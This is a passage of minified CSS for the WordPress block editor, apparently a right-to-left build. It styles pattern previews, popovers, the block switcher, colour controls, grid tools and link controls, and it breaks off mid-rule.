.block-editor-block-preview__container:after{outline-color:#1e1e1e;outline-offset:calc(var(--wp-admin-border-width-focus)*-1);outline-width:var(--wp-admin-border-width-focus)}.block-editor-block-patterns-list__item:hover .block-editor-block-preview__container:after{outline-color:#0000004d}.block-editor-block-patterns-list__item[data-focus-visible] .block-editor-block-preview__container:after{outline-color:var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-1);outline-width:var(--wp-admin-border-width-focus)}.block-editor-block-patterns-list__item .block-editor-patterns__pattern-details:not(:empty){align-items:center;margin-top:8px;padding-bottom:4px}.block-editor-block-patterns-list__item .block-editor-patterns__pattern-icon-wrapper{height:24px;min-width:24px}.block-editor-block-patterns-list__item .block-editor-patterns__pattern-icon-wrapper .block-editor-patterns__pattern-icon{fill:var(--wp-block-synced-color)}.block-editor-patterns__grid-pagination-wrapper .block-editor-patterns__grid-pagination{border-top:1px solid #2f2f2f;justify-content:center;padding:4px}.show-icon-labels .block-editor-patterns__grid-pagination-button{width:auto}.show-icon-labels .block-editor-patterns__grid-pagination-button span{display:none}.show-icon-labels .block-editor-patterns__grid-pagination-button:before{content:attr(aria-label)}.components-popover.block-editor-block-popover{margin:0!important;pointer-events:none;position:absolute;z-index:31}.components-popover.block-editor-block-popover .components-popover__content{margin:0!important;min-width:auto;overflow-y:visible;width:max-content}.components-popover.block-editor-block-popover:not(.block-editor-block-popover__inbetween,.block-editor-block-popover__drop-zone,.block-editor-block-list__block-side-inserter-popover) .components-popover__content *{pointer-events:all}.components-popover.block-editor-block-popover__inbetween,.components-popover.block-editor-block-popover__inbetween *{pointer-events:none}.components-popover.block-editor-block-popover__inbetween .is-with-inserter,.components-popover.block-editor-block-popover__inbetween .is-with-inserter *{pointer-events:all}.components-popover.block-editor-block-popover__drop-zone *{pointer-events:none}.components-popover.block-editor-block-popover__drop-zone .block-editor-block-popover__drop-zone-foreground{background-color:var(--wp-admin-theme-color);border-radius:2px;inset:0;position:absolute}.block-editor-block-preview__container{overflow:hidden;position:relative;width:100%}.block-editor-block-preview__container .block-editor-block-preview__content{margin:0;min-height:auto;overflow:visible;right:0;text-align:initial;top:0;transform-origin:top right;width:100%}.block-editor-block-preview__container .block-editor-block-preview__content .block-editor-block-list__insertion-point,.block-editor-block-preview__container .block-editor-block-preview__content .block-list-appender{display:none}.block-editor-block-preview__container:after{bottom:0;content:"";left:0;position:absolute;right:0;top:0;z-index:1}.block-editor-block-rename-modal{z-index:1000001}.block-editor-block-styles__preview-panel{display:none;z-index:90}@media (min-width:782px){.block-editor-block-styles__preview-panel{display:block}}.block-editor-block-styles__preview-panel .block-editor-block-icon{display:none}.block-editor-block-styles__variants{display:flex;flex-wrap:wrap;gap:8px;justify-content:space-between}.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item{box-shadow:inset 0 0 0 1px #ddd;color:#1e1e1e;display:inline-block;width:calc(50% - 4px)}.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item:hover{box-shadow:inset 0 0 0 1px #ddd;color:var(--wp-admin-theme-color)}.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active,.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active:hover{background-color:#1e1e1e;box-shadow:none}.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active .block-editor-block-styles__item-text,.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active:hover .block-editor-block-styles__item-text{color:#fff}.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active:focus,.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item:focus{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.block-editor-block-styles__variants .block-editor-block-styles__item-text{text-align:start;text-align-last:center;white-space:normal;word-break:break-all}.block-editor-block-styles__block-preview-container,.block-editor-block-styles__block-preview-container *{box-sizing:border-box!important}.block-editor-block-switcher{position:relative}.block-editor-block-switcher .components-button.components-dropdown-menu__toggle.has-icon.has-icon{min-width:36px}.block-editor-block-switcher__no-switcher-icon,.block-editor-block-switcher__toggle{position:relative}.components-button.block-editor-block-switcher__no-switcher-icon,.components-button.block-editor-block-switcher__toggle{display:block;height:48px;margin:0}.components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-icon,.components-button.block-editor-block-switcher__toggle .block-editor-block-icon{margin:auto}.components-button.block-editor-block-switcher__no-switcher-icon{display:flex}.components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-icon{margin-left:auto;margin-right:auto;min-width:24px!important}.components-button.block-editor-block-switcher__no-switcher-icon[aria-disabled=true],.components-button.block-editor-block-switcher__no-switcher-icon[aria-disabled=true]:hover{color:#1e1e1e}.components-popover.block-editor-block-switcher__popover .components-popover__content{min-width:300px}.block-editor-block-switcher__popover-preview-container{bottom:0;pointer-events:none;position:absolute;right:0;top:-1px;width:100%}.block-editor-block-switcher__popover-preview{overflow:hidden}.block-editor-block-switcher__popover-preview .components-popover__content{background:#fff;border:1px solid #1e1e1e;border-radius:4px;box-shadow:none;outline:none;overflow:auto;width:300px}.block-editor-block-switcher__popover-preview .block-editor-block-switcher__preview{margin:16px 0;max-height:468px;overflow:hidden;padding:0 16px}.block-editor-block-switcher__popover-preview .block-editor-block-switcher__preview.is-pattern-list-preview{overflow:unset}.block-editor-block-switcher__preview-title{color:#757575;font-size:11px;font-weight:500;margin-bottom:12px;text-transform:uppercase}.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon{min-width:36px}.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle{height:48px}.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-icon,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-switcher__transform,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle .block-editor-block-icon,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle .block-editor-block-switcher__transform{height:48px;width:48px}.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-switcher__transform,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle .block-editor-block-switcher__transform{padding:12px}.block-editor-block-switcher__preview-patterns-container{padding-bottom:16px}.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item{margin-top:16px}.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-preview__container{cursor:pointer}.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item{border-radius:2px;height:100%}@media not (prefers-reduced-motion){.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item{transition:all .05s ease-in-out}}.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item{border:1px solid #0000;position:relative}.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item:focus,.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item:hover{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item:hover{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) #1e1e1e}.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item .block-editor-block-switcher__preview-patterns-container-list__item-title{cursor:pointer;font-size:12px;padding:4px;text-align:center}.block-editor-block-switcher__no-transforms{color:#757575;margin:0;padding:6px 8px}.block-editor-block-switcher__binding-indicator{display:block;padding:8px}.block-editor-block-types-list>[role=presentation]{display:flex;flex-wrap:wrap;overflow:hidden}.block-editor-block-pattern-setup{align-items:flex-start;border-radius:2px;display:flex;flex-direction:column;justify-content:center;width:100%}.block-editor-block-pattern-setup.view-mode-grid{padding-top:4px}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__toolbar{justify-content:center}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container{column-count:2;column-gap:24px;display:block;padding:0 32px;width:100%}@media (min-width:1440px){.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container{column-count:3}}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-preview__container,.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container div[role=button]{cursor:pointer}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item{scroll-margin:5px 0}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:hover .block-editor-block-preview__container{box-shadow:0 0 0 2px var(--wp-admin-theme-color)}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:focus .block-editor-block-preview__container{box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff,0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color);outline:2px solid #0000;outline-offset:2px}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:focus .block-editor-block-pattern-setup-list__item-title,.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:hover .block-editor-block-pattern-setup-list__item-title{color:var(--wp-admin-theme-color)}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item{break-inside:avoid-column;margin-bottom:24px}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item .block-editor-block-pattern-setup-list__item-title{cursor:pointer;font-size:12px;padding-top:8px;text-align:center}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item .block-editor-block-preview__container{border:1px solid #ddd;border-radius:4px;min-height:100px}.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item .block-editor-block-preview__content{width:100%}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar{align-items:center;align-self:stretch;background-color:#fff;border-top:1px solid #ddd;bottom:0;box-sizing:border-box;color:#1e1e1e;display:flex;flex-direction:row;height:64px;justify-content:space-between;margin:0;padding:16px;position:absolute;text-align:right;width:100%}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__display-controls{display:flex}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__actions,.block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__navigation{display:flex;width:calc(50% - 36px)}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__actions{justify-content:flex-end}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container{box-sizing:border-box;display:flex;flex-direction:column;height:100%;width:100%}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container{height:100%;list-style:none;margin:0;overflow:hidden;padding:0;position:relative;transform-style:preserve-3d}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container *{box-sizing:border-box}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide{background-color:#fff;height:100%;margin:auto;padding:0;position:absolute;top:0;width:100%}@media not (prefers-reduced-motion){.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide{transition:transform .5s,z-index .5s}}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide{z-index:100}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide.active-slide{opacity:1;position:relative;z-index:102}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide.previous-slide{transform:translateX(100%);z-index:101}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide.next-slide{transform:translateX(-100%);z-index:101}.block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .block-list-appender{display:none}.block-editor-block-pattern-setup__carousel,.block-editor-block-pattern-setup__grid{width:100%}.block-editor-block-variation-transforms:where(fieldset){border:0;margin:0;padding:0}.block-editor-block-variation-transforms{box-sizing:border-box;padding:0 52px 16px 16px;width:100%}.block-editor-block-variation-transforms .components-dropdown-menu__toggle{border:1px solid #757575;border-radius:2px;justify-content:right;min-height:30px;padding:6px 12px;position:relative;text-align:right;width:100%}.block-editor-block-variation-transforms .components-dropdown-menu__toggle.components-dropdown-menu__toggle{padding-left:24px}.block-editor-block-variation-transforms .components-dropdown-menu__toggle:focus:not(:disabled){border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 calc(var(--wp-admin-border-width-focus) - 1px) var(--wp-admin-theme-color)}.block-editor-block-variation-transforms .components-dropdown-menu__toggle svg{height:100%;left:0;padding:0;position:absolute;top:0}.block-editor-block-variation-transforms__popover .components-popover__content{min-width:230px}.components-border-radius-control__header{height:16px;margin-bottom:12px}.components-border-radius-control{border:0;margin:0 0 12px;padding:0}.components-border-radius-control legend{margin-bottom:0}.components-border-radius-control .components-border-radius-control__input-controls-wrapper{display:grid;gap:16px;grid-template-columns:repeat(2,minmax(0,1fr));margin-left:12px}.components-border-radius-control .components-border-radius-control__linked-button{display:flex;justify-content:center}.components-border-radius-control .components-border-radius-control__linked-button svg{margin-left:0}.components-border-radius-control__custom-select-control,.components-border-radius-control__range-control{flex:1}.components-border-radius-control__icon{flex:0 0 auto}.block-editor-color-gradient-control .block-editor-color-gradient-control__color-indicator{margin-bottom:12px}.block-editor-color-gradient-control__fieldset{border:0;margin:0;min-width:0;padding:0}.block-editor-panel-color-gradient-settings.block-editor-panel-color-gradient-settings,.block-editor-panel-color-gradient-settings.block-editor-panel-color-gradient-settings>div:not(:first-of-type){display:block}@media screen and (min-width:782px){.block-editor-panel-color-gradient-settings .components-circular-option-picker__swatches{display:grid;grid-template-columns:repeat(6,28px)}}.block-editor-block-inspector .block-editor-panel-color-gradient-settings .components-base-control{margin-bottom:inherit}.block-editor-panel-color-gradient-settings__dropdown-content{min-height:160px}.block-editor-panel-color-gradient-settings__dropdown-content .block-editor-color-gradient-control__panel{padding:16px;width:260px}.block-editor-panel-color-gradient-settings__color-indicator{background:linear-gradient(45deg,#0000 48%,#ddd 0,#ddd 52%,#0000 0)}.block-editor-tools-panel-color-gradient-settings__item{border-bottom:1px solid #ddd;border-left:1px solid #ddd;border-right:1px solid #ddd;max-width:100%;padding:0;position:relative}.block-editor-tools-panel-color-gradient-settings__item:nth-child(1 of .block-editor-tools-panel-color-gradient-settings__item){border-top:1px solid #ddd;border-top-left-radius:2px;border-top-right-radius:2px;margin-top:24px}.block-editor-tools-panel-color-gradient-settings__item:nth-last-child(1 of .block-editor-tools-panel-color-gradient-settings__item){border-bottom-left-radius:2px;border-bottom-right-radius:2px}.block-editor-tools-panel-color-gradient-settings__item>div,.block-editor-tools-panel-color-gradient-settings__item>div>button{border-radius:inherit}.block-editor-tools-panel-color-gradient-settings__dropdown{display:block;padding:0}.block-editor-tools-panel-color-gradient-settings__dropdown>button{height:auto;padding-bottom:10px;padding-top:10px;text-align:right}.block-editor-tools-panel-color-gradient-settings__dropdown>button.is-open{background:#f0f0f0;color:var(--wp-admin-theme-color)}.block-editor-tools-panel-color-gradient-settings__dropdown .block-editor-panel-color-gradient-settings__color-name{max-width:calc(100% - 44px);overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.block-editor-panel-color-gradient-settings__dropdown{width:100%}.block-editor-panel-color-gradient-settings__dropdown .component-color-indicator{flex-shrink:0}.block-editor-panel-color-gradient-settings__reset{left:0;margin:auto 8px;opacity:0;position:absolute;top:8px}@media not (prefers-reduced-motion){.block-editor-panel-color-gradient-settings__reset{transition:opacity .1s ease-in-out}}.block-editor-panel-color-gradient-settings__reset.block-editor-panel-color-gradient-settings__reset{border-radius:2px}.block-editor-panel-color-gradient-settings__dropdown:hover+.block-editor-panel-color-gradient-settings__reset,.block-editor-panel-color-gradient-settings__reset:focus,.block-editor-panel-color-gradient-settings__reset:hover{opacity:1}@media (hover:none){.block-editor-panel-color-gradient-settings__reset{opacity:1}}.block-editor-date-format-picker{border:none;margin:0 0 16px;padding:0}.block-editor-date-format-picker__custom-format-select-control__custom-option{border-top:1px solid #ddd}.block-editor-duotone-control__popover.components-popover>.components-popover__content{padding:8px;width:260px}.block-editor-duotone-control__popover.components-popover .components-menu-group__label{padding:0}.block-editor-duotone-control__popover.components-popover .components-circular-option-picker__swatches{display:grid;gap:12px;grid-template-columns:repeat(6,28px);justify-content:space-between}.block-editor-duotone-control__unset-indicator{background:linear-gradient(45deg,#0000 48%,#ddd 0,#ddd 52%,#0000 0)}.components-font-appearance-control [role=option]{color:#1e1e1e;text-transform:capitalize}.block-editor-font-family-control:not(.is-next-has-no-margin-bottom){margin-bottom:8px}.block-editor-global-styles__toggle-icon{fill:currentColor}.block-editor-global-styles__shadow-popover-container{width:230px}.block-editor-global-styles__shadow__list{display:flex;flex-wrap:wrap;gap:12px;padding-bottom:8px}.block-editor-global-styles__clear-shadow{text-align:left}.block-editor-global-styles-filters-panel__dropdown,.block-editor-global-styles__shadow-dropdown{border:1px solid #ddd;border-radius:2px;display:block;padding:0;position:relative}.block-editor-global-styles-filters-panel__dropdown-toggle,.block-editor-global-styles__shadow-dropdown-toggle{padding:8px;width:100%}.block-editor-global-styles-filters-panel__dropdown-toggle.is-open,.block-editor-global-styles__shadow-dropdown-toggle.is-open{background-color:#f0f0f0}.block-editor-global-styles__shadow-editor__remove-button{left:0;margin:auto 8px;opacity:0;position:absolute;top:8px}@media not (prefers-reduced-motion){.block-editor-global-styles__shadow-editor__remove-button{transition:opacity .1s ease-in-out}}.block-editor-global-styles__shadow-dropdown:hover .block-editor-global-styles__shadow-editor__remove-button,.block-editor-global-styles__shadow-editor__remove-button:focus,.block-editor-global-styles__shadow-editor__remove-button:hover{opacity:1}@media (hover:none){.block-editor-global-styles__shadow-editor__remove-button{opacity:1}}.block-editor-global-styles__shadow-indicator{align-items:center;appearance:none;background:none;border:1px solid #e0e0e0;border-radius:2px;box-sizing:border-box;color:#2f2f2f;cursor:pointer;display:inline-flex;height:26px;padding:0;transform:scale(1);width:26px}@media not (prefers-reduced-motion){.block-editor-global-styles__shadow-indicator{transition:transform .1s ease}}.block-editor-global-styles__shadow-indicator{will-change:transform}.block-editor-global-styles__shadow-indicator:focus{border:2px solid #757575}.block-editor-global-styles__shadow-indicator:hover{transform:scale(1.2)}.block-editor-global-styles__shadow-indicator.unset{background:linear-gradient(45deg,#0000 48%,#ddd 0,#ddd 52%,#0000 0)}.block-editor-global-styles-advanced-panel__custom-css-input textarea{direction:ltr;font-family:Menlo,Consolas,monaco,monospace}.block-editor-panel-duotone-settings__reset{left:0;margin:auto 8px;opacity:0;position:absolute;top:8px}@media not (prefers-reduced-motion){.block-editor-panel-duotone-settings__reset{transition:opacity .1s ease-in-out}}.block-editor-global-styles-filters-panel__dropdown:hover .block-editor-panel-duotone-settings__reset,.block-editor-panel-duotone-settings__reset:focus,.block-editor-panel-duotone-settings__reset:hover{opacity:1}@media (hover:none){.block-editor-panel-duotone-settings__reset{opacity:1}}.block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer{z-index:30}.block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer .components-popover__content *{pointer-events:none}.block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer.is-dropping-allowed .block-editor-grid-visualizer__drop-zone{pointer-events:all}.block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer .block-editor-inserter *{pointer-events:auto}.block-editor-grid-visualizer__grid{display:grid;position:absolute}.block-editor-grid-visualizer__cell{display:grid;position:relative}.block-editor-grid-visualizer__cell .block-editor-inserter{bottom:0;color:inherit;left:0;overflow:hidden;position:absolute;right:0;top:0;z-index:32}.block-editor-grid-visualizer__cell .block-editor-inserter .block-editor-grid-visualizer__appender{box-shadow:inset 0 0 0 1px color-mix(in srgb,currentColor 20%,#0000);color:inherit;height:100%;opacity:0;overflow:hidden;padding:0!important;width:100%}.block-editor-grid-visualizer__cell.is-highlighted .block-editor-grid-visualizer__drop-zone,.block-editor-grid-visualizer__cell.is-highlighted .block-editor-inserter{background:var(--wp-admin-theme-color)}.block-editor-grid-visualizer__cell .block-editor-grid-visualizer__appender:focus,.block-editor-grid-visualizer__cell:hover .block-editor-grid-visualizer__appender{background-color:color-mix(in srgb,currentColor 20%,#0000);opacity:1}.block-editor-grid-visualizer__drop-zone{background:#cccccc1a;grid-column:1;grid-row:1;height:100%;min-height:8px;min-width:8px;width:100%}.block-editor-grid-item-resizer.block-editor-grid-item-resizer.block-editor-grid-item-resizer{z-index:30}.block-editor-grid-item-resizer.block-editor-grid-item-resizer.block-editor-grid-item-resizer .components-popover__content *{pointer-events:none}.block-editor-grid-item-resizer__box{border:1px solid var(--wp-admin-theme-color)}.block-editor-grid-item-resizer__box .components-resizable-box__handle.components-resizable-box__handle.components-resizable-box__handle{pointer-events:all}.block-editor-grid-item-mover__move-button-container{border:none;display:flex;justify-content:center;padding:0}.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button{min-width:0!important;padding-left:0;padding-right:0;width:24px}.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button svg{min-width:24px}.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:before{border-radius:2px;content:"";display:block;height:32px;left:8px;position:absolute;right:8px;z-index:-1}@media not (prefers-reduced-motion){.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:before{animation:components-button__appear-animation .1s ease;animation-fill-mode:forwards}}.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus,.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus:before,.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus:enabled{box-shadow:none;outline:none}.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus-visible:before{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.block-editor-grid-item-mover__move-vertical-button-container{display:flex;position:relative}@media (min-width:600px){.block-editor-grid-item-mover__move-vertical-button-container{flex-direction:column;justify-content:space-around}.block-editor-grid-item-mover__move-vertical-button-container>.block-editor-grid-item-mover-button.block-editor-grid-item-mover-button{height:20px!important;min-width:0!important;width:100%}.block-editor-grid-item-mover__move-vertical-button-container>.block-editor-grid-item-mover-button.block-editor-grid-item-mover-button:before{height:calc(100% - 4px)}.block-editor-grid-item-mover__move-vertical-button-container .block-editor-grid-item-mover-button.is-down-button svg,.block-editor-grid-item-mover__move-vertical-button-container .block-editor-grid-item-mover-button.is-up-button svg{flex-shrink:0;height:20px}.editor-collapsible-block-toolbar .block-editor-grid-item-mover__move-vertical-button-container{height:40px;position:relative;top:-4px}}.show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container{position:relative}@media (min-width:600px){.show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container:before{background:#e0e0e0;content:"";height:100%;position:absolute;top:0;width:1px}}@media (min-width:782px){.show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container:before{background:#1e1e1e}}.show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-left{padding-left:6px}.show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-left:before{left:0}.show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-right{padding-right:6px}.show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-right:before{right:0}@media (min-width:600px){.show-icon-labels .block-editor-grid-item-mover__move-vertical-button-container:before{background:#e0e0e0;content:"";height:1px;margin-top:-.5px;position:absolute;right:50%;top:50%;transform:translate(50%);width:100%}}@media (min-width:782px){.show-icon-labels .block-editor-grid-item-mover__move-vertical-button-container:before{background:#1e1e1e}}.show-icon-labels .block-editor-grid-item-mover-button{white-space:nowrap}.show-icon-labels .editor-collapsible-block-toolbar .block-editor-grid-item-mover__move-horizontal-button-container:before{background:#ddd;height:24px;top:4px}.show-icon-labels .editor-collapsible-block-toolbar .block-editor-grid-item-mover__move-vertical-button-container:before{background:#ddd;width:calc(100% - 24px)}.block-editor-height-control{border:0;margin:0;padding:0}.block-editor-iframe__container{height:100%;width:100%}.block-editor-iframe__scale-container{height:100%}.block-editor-iframe__scale-container.is-zoomed-out{left:0;position:absolute;width:var(--wp-block-editor-iframe-zoom-out-scale-container-width,100vw)}.block-editor-block-types-list__list-item{display:block;margin:0;padding:0;width:33.33%}.block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled) .block-editor-block-icon.has-colors{color:var(--wp-block-synced-color)}.block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled):hover .block-editor-block-types-list__item-title{color:var(--wp-block-synced-color)!important;filter:brightness(.95)}.block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled):hover svg{color:var(--wp-block-synced-color)!important}.block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled):after{background:var(--wp-block-synced-color)}.components-button.block-editor-block-types-list__item{align-items:stretch;background:#0000;color:#1e1e1e;cursor:pointer;display:flex;flex-direction:column;font-size:13px;justify-content:center;padding:8px;width:100%;word-break:break-word}@media not (prefers-reduced-motion){.components-button.block-editor-block-types-list__item{transition:all .05s ease-in-out}}.components-button.block-editor-block-types-list__item{height:auto;position:relative}.components-button.block-editor-block-types-list__item:disabled,.components-button.block-editor-block-types-list__item[aria-disabled=true]{cursor:default;opacity:.6}.components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]):hover .block-editor-block-types-list__item-title{color:var(--wp-admin-theme-color)!important;filter:brightness(.95)}.components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]):hover svg{color:var(--wp-admin-theme-color)!important}.components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]):hover:after{background:var(--wp-admin-theme-color);border-radius:2px;bottom:0;content:"";left:0;opacity:.04;pointer-events:none;position:absolute;right:0;top:0}.components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]).is-active{background:#1e1e1e;color:#fff;outline:2px solid #0000;outline-offset:-2px}.components-button.block-editor-block-types-list__item:not(:disabled):focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.block-editor-block-types-list__item-icon{color:#1e1e1e;padding:12px 20px}@media not (prefers-reduced-motion){.block-editor-block-types-list__item-icon{transition:all .05s ease-in-out}}.block-editor-block-types-list__item-icon .block-editor-block-icon{margin-left:auto;margin-right:auto}@media not (prefers-reduced-motion){.block-editor-block-types-list__item-icon svg{transition:all .15s ease-out}}.block-editor-block-types-list__list-item[draggable=true] .block-editor-block-types-list__item-icon{cursor:grab}.block-editor-block-types-list__item-title{font-size:12px;hyphens:auto;padding:4px 2px 8px}.block-editor-block-inspector__tabs [role=tablist]{width:100%}.block-editor-inspector-popover-header{margin-bottom:16px}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}@keyframes loadingpulse{0%{opacity:1}50%{opacity:0}to{opacity:1}}.block-editor-link-control{min-width:350px;position:relative}.components-popover__content .block-editor-link-control{max-width:350px;min-width:auto;width:90vw}.show-icon-labels .block-editor-link-control .components-button.has-icon svg{display:none}.show-icon-labels .block-editor-link-control .components-button.has-icon:before{content:attr(aria-label)}.show-icon-labels .block-editor-link-control .block-editor-link-control__search-item-top{flex-wrap:wrap;gap:4px}.show-icon-labels .block-editor-link-control .block-editor-link-control__search-item-top .components-button.has-icon{padding:4px;width:auto}.show-icon-labels .block-editor-link-control .is-preview .block-editor-link-control__search-item-header{margin-left:0;min-width:100%}.block-editor-link-control__search-input-wrapper{margin-bottom:8px;position:relative}.block-editor-link-control__help{color:#757575;font-size:12px;font-style:normal;margin-bottom:0;margin-top:-8px;padding:0 16px}.block-editor-link-control__search-input-container,.block-editor-link-control__search-input-wrapper{position:relative}.block-editor-link-control__field{margin:16px}.block-editor-link-control__field .components-base-control__label{color:#1e1e1e}.block-editor-link-control__search-error{margin:-8px 16px 16px}.block-editor-link-control__search-actions{padding:8px 16px 